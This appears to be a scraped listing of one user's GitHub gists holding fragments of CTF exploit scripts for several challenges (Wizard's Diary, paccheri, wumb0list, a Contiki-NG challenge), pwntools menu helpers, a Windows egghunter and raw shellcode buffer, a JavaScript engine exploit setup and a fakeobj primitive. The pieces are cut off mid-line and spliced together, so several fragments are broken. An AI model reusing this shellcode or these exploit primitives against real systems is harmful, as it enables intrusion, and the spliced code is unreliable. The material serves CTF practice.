
YiChenChai / expl.py
Created December 8, 2022 00:56
HTB University CTF 2022 Wizard's Diary exploit
from pwn import *
def login(info):
    """Answer the two login prompts in order: a fixed name, then *info* at the account prompt.

    Relies on the module-level pwntools tube ``proc``; each reply is sent as a line
    once the matching prompt fragment has been received.
    """
    exchange = (('Name: ', 'guest'), ('account: ', info))
    for prompt, reply in exchange:
        proc.sendlineafter(prompt, reply)
def new_note(sz, cnt):
    """Drive menu option 1 (create a note) on the module-level tube ``proc``.

    ``sz`` is sent as a line at the size prompt; ``cnt`` is sent verbatim (no
    trailing newline) at the content prompt, so the caller controls its length.
    """
    steps = [
        (proc.sendlineafter, '> ', '1'),
        (proc.sendlineafter, 'note: ', str(sz)),
        (proc.sendafter, 'Note: ', cnt),
    ]
    for send, prompt, payload in steps:
        send(prompt, payload)
YiChenChai / expl1.py
Created November 8, 2022 19:48
LakeCTF 2022 paccheri solution
from pwn import *
# context.log_level = 'debug'
def add_pkg(dest):
    """Pick menu option 1 and answer the address prompt with *dest*.

    Uses the module-level pwntools tube ``proc``; both replies are sent as lines
    after the given prompt fragment has been seen.
    """
    choice = '1'
    for prompt, reply in (('too long', choice), ('address:', dest)):
        proc.sendlineafter(prompt, reply)
def remove_pkg(idx):
proc.sendlineafter('too long', '2')
egghunter = "I\xbe\x08\x94\x1c\x80\x01\x00\x00\x00H\xc7\xc1\x00\x11\x00\x00A\xff\x96\xd8\x0c\x00\x00H\x05\x00\x0f\x00\x00H\x8d\xa8\x00\x01\x00\x00H\x89\xc4H\x83\xecPH\xb92\xbb=\x80\x01\x00\x00\x00A\xff\x16I\x89\xc5H\x89\xc1A\xffV0H\x89\xc6H1\xdbH\x01\xdeL\x89\xe9H\x8d\x15\x02\x00\x00\x00\xeb\rVirtualQuery\x00A\xff\x96\x88\x01\x00\x00H\x89\xf1H\x89\xeaI\xc7\xc0\x00\x01\x00\x00\xff\xd0\x8b]\x18H\x8bu\x00\x8bE \xa9\x00 \x01\x00u\xbd\x8bE(\xa9\x00\x00\x02\x00t\xb3\x8bE$\xa9\x01\x00\x00\x00u\xa9L\x8d\x0c\x1eH\x8b\x06H=\xef\xbe7\x13t\x0bH\x83\xc6\x08L9\xceu\xec\xeb\x8fI\x89\xf1H\x83\xc6\x08H\x89\xf1H\xc7\xc2\x00P\x00\x00I\xc7\xc0@\x00\x00\x00H\x8d\x1d'\xff\xff\xff\xffS\xf8\xff\xe6"
buf = ""
buf += "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41"
buf += "\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48"
buf += "\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f"
buf += "\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c"
buf += "\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52"
buf += "\x41\x51\x
import idaapi
import idautils
import idc
import ida_hexrays
def mod_sig(ea):
tinfo = idaapi.tinfo_t()
ida_typeinf.guess_tinfo(tinfo, ea)
funcdet = idaapi.func_type_data_t()
tinfo.get_func_details(funcdet)
from vulnmod import *
import paramiko
import logging
logging.basicConfig()
logging.getLogger("paramiko").setLevel(logging.DEBUG) # for example
# VulnSSHClient comes from the star-import of vulnmod above; its behaviour is not visible here.
ssh_client = VulnSSHClient()
# AutoAddPolicy accepts and stores any unknown host key without verification, so this
# session has no protection against a host impersonating the target. That is tolerable
# only against a throwaway lab box; a pre-populated known_hosts (RejectPolicy) is the
# safe default anywhere else.
ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
# Placeholder host and credentials; real values should come from the environment or a
# prompt rather than being committed in source.
ssh_client.connect(hostname='x.x.x.x',username='xxx',password='xxx')
(defn fakeobj [a b]
  # Reinterpret two 32-bit unsigned integers as one IEEE-754 double: the two
  # typed-array views share the same 8-byte buffer, so writing the uint32 view
  # (index 0 <- b, index 1 <- a) sets the byte pattern the float64 view reads.
  # On a little-endian host b therefore lands in the low 32 bits and a in the high 32.
  (def raw (tarray/buffer 8))
  (def words (tarray/new :uint32 2 1 0 raw))
  (def as-double (tarray/new :float64 1 1 0 raw))
  (put words 0 b)
  (put words 1 a)
  (as-double 0))
(defn funcarg [a]
  # Invoke the callable a with no arguments and return its result.
  (a))
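// Polyfill for String.prototype.repeat (ES2015) for engines that lack it.
// Builds the result by repeated doubling, then tops up with a partial copy.
//   count: number of copies wanted; coerced to an integer (NaN counts as 0).
// Returns the repeated string. Throws TypeError when called on null/undefined
// and RangeError for a negative or infinite count, as the specification requires.
String.prototype.repeat = function (count) {
  if (this == null) {
    throw new TypeError("can't convert " + this + " to object");
  }
  var str = '' + this;
  count = +count;
  if (count !== count) { // NaN -> 0 (ToInteger)
    count = 0;
  }
  if (count < 0 || count === Infinity) {
    throw new RangeError('repeat count must be non-negative and finite');
  }
  count = Math.floor(count);
  // Zero guard: without it Math.log(0) is -Infinity and the doubling loop
  // below never terminates (the loop counter stays -Infinity forever).
  if (count === 0 || str.length === 0) {
    return '';
  }
  var maxCount = str.length * count;
  // Double the string floor(log2(count)) times; any remainder is appended
  // afterwards, so rounding the logarithm down is harmless.
  var doublings = Math.floor(Math.log(count) / Math.log(2));
  while (doublings) {
    str += str;
    doublings--;
  }
  str += str.substring(0, maxCount - str.length);
  return str;
};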
// Top-level objects created before the rest of the script (which continues past
// this excerpt). Most are assigned without var/let, so they become implicit globals.
zzzaa = [];
// NOTE(review): per ECMAScript a DataView's first argument must be an ArrayBuffer,
// so `new DataView(141)` throws a TypeError in a conforming engine; presumably the
// engine this script targets accepts it — confirm.
zzzcb1 = new DataView(141);
zzzcb2 = new Number(1337);
zzzcc1 = []; zzzcc2 = []; zzzcc3 = []; zzzcc4 = []; zzzcc5 = []; zzzcc6 = [];
// Both strings are built with the String.prototype.repeat defined above.
var zzzbb1 = "A".repeat(65534);
var zzzbb2 = "\x11".repeat(64); //64
// 65535 + seplen _+ str1len
from pwn import *
# Start the local debug build with LD_PRELOAD pointing at a specific libc build, presumably
# so the process runs against the same libc the rest of this script expects — confirm the
# path matches the intended library when reusing this elsewhere.
proc = process('/tmp/pwn/onetimepad_debug', env={'LD_PRELOAD':'/tmp/out/lib/x86_64-linux-gnu/libc.so.6'})
# proc = remote('88.198.154.140', 31336)
def write(c):
    """Select the 'w' menu action on the module-level tube ``proc`` and send *c* as one line.

    Note: the name shadows the builtin ``write``-style helpers only by convention here;
    nothing in this module relies on a builtin of that name.
    """
    menu_choice = 'w'
    proc.sendlineafter('> ', menu_choice)
    proc.sendline(c)
def read(idx):
    """Select the 'r' menu action, request entry *idx*, and return the reply line.

    The trailing newline received from ``proc`` is stripped before returning.
    """
    proc.sendlineafter('> ', 'r')
    proc.sendline(str(idx))
    reply = proc.recvuntil('\n')
    return reply[:-1]
YiChenChai / wumb0list.py
Created November 21, 2019 09:45
Exploit for wumb0list RITSEC CTF 2019
from pwn import *
# context.log_level = 'debug'
proc = process('./wumb0list')
# Constants consumed by the later (not shown) part of the script. Their names suggest
# library-relative values for this challenge; nothing visible here confirms which
# build they were taken from, so re-derive them before reusing against another binary.
OFFSET = 0x809c0
FREE_HOOK = 0x3ed8e8
PIVOT = 0x40568
# Menu walk: each call waits for the given prompt fragment, then sends the reply as a line.
proc.sendlineafter('FAM', '2')
proc.sendlineafter('Back', '1')
# Two 64-bit little-endian values (pwntools p64) concatenated and sent as a single line.
proc.sendlineafter('Choose wisely: ', p64(0x603020) + p64(0x6030d8))
proc.sendlineafter('Back', '4')
YiChenChai / exploit.py
Created October 30, 2019 14:10
Exploit for hack.lu Contiki-NG challenge
from pwn import *
from slip import slip
# flag: flag{IoT_operating_system_down_wooo}
# Listen on TCP port 60001 (pwntools server) and treat the first inbound connection as the peer.
serv = server(60001)
proc = serv.next_connection()
# Framing helper from the local `slip` module; `e` is shorthand for its encode method.
sobj = slip()
e = sobj.encode
# First frame: the two characters '!M' followed by eight zero bytes, encoded before sending.
proc.send(e('!M' + '\x00' * 8))
first_frag = '\x01' * 2 # Useless header
# Size used by the fragment-building code that follows this excerpt.
sz = 0x100